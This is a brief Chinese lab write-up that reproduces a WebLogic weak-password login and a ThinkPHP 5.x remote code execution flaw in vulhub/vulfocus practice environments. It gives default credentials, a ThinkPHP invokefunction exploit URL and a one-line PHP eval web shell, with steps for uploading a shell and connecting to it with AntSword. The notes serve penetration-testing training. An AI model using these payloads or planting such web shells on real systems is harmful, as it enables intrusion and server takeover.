10期 weblogic弱口令漏洞
weblogic弱口令漏洞
使用vulhhb复现
靶场路径jieya\vulhub-master\weblogic\weak_password
第一次启动靶场要初始化,需要些时间
启动环境之后,访问后台地址
http://ip:7001/console
可以使用burp进行弱口令爆破
本环境输⼊weblogic:Oracle@123即可登录后台
对其getshell连接
选择上传文件
用上期做的wra包,无脑下一步即可
部署成功后尝试访问
用蚁剑进行连接
2.使用goby对其进行扫描
可以看到有很多漏洞 在goby中可进行简单的测试
3复现thinkphp 5.x命令执行漏洞
使用vulfocus
启动
任意代码执⾏
index.php?s=index/think\app/invokefunction&functi
on=call_user_func_array&vars[0]=system&vars[1][]=
环境中也有教程
发现命令执行漏洞
对其getshell
<?php eval($_POST['4']);?>
直接修改![]()
成功写入
用蚁剑连接